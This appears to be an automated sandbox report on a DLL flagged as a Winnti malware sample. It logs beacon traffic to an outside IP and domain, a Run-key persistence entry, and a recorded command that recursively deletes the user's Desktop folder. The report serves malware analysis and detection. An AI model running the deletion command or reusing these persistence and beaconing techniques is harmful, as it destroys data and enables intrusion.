Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global traffic | DNS traffic detected: DNS query: host123.zz.am
Source: global traffic | DNS traffic detected: DNS query: blog.sina.com.cn
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:50003 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:50097 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:50187 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:51237 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:51920 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:58988 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:63631 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:49565 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:52236 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:59311 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:61403 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:51650 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:60620 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:49251 version: TLS 1.2

System Summary

Source: QCTYoyX422.dll, type: SAMPLEMatched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth
Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth
Source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth
Source: 17.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth
Source: QCTYoyX422.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 49%
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10008AAD: DeviceIoControl,3_2_10008AAD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10003F63 ExitWindowsEx,3_2_10003F63
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000B2243_2_1000B224
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000B70D3_2_1000B70D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100121ED3_2_100121ED
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000AEC03_2_1000AEC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10001000 appears 305 times
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 680
Source: QCTYoyX422.dllBinary or memory string: OriginalFilenamejscript.dllL vs QCTYoyX422.dll
Source: QCTYoyX422.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
Source: QCTYoyX422.dll, type: SAMPLEMatched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: QCTYoyX422.dllStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: classification engineClassification label: mal100.troj.spyw.evad.winDLL@42/11@48/5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000404F AdjustTokenPrivileges,3_2_1000404F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10003FB7 CreateToolhelp32Snapshot,3_2_10003FB7
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\Desktop\12010043
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2148:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3780
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4036:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\host123.zz.am:6658
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Mhost123.zz.am:6658
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\0x5d65r455f
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3852
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\959a49ad-652b-45ae-bb57-67bda4b3468d
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,DoAddToFavDlg
Source: QCTYoyX422.dllReversingLabs: Detection: 78%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,DoAddToFavDlg
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,InputFile
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,PrintFile
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 680
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",InputFile
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",PrintFile
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3780 -s 668
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: mfc42.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: msvcp60.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: wininet.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: avicap32.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: msvfw32.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: winmm.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: samcli.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: netutils.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Binary string: \??\c:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: rundll32.exe, 00000003.00000003.2507225694.0000000002791000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: rundll32.exe, 00000003.00000003.2507250715.000000000278B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*.*\*.* source: rundll32.exe, 00000003.00000003.4481849158.000000000276E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*.*.* source: rundll32.exe, 00000003.00000003.4508123861.000000000276E000.00000004.00000020.00020000.00000000.sdmp

Boot Survival

Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dtfd

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
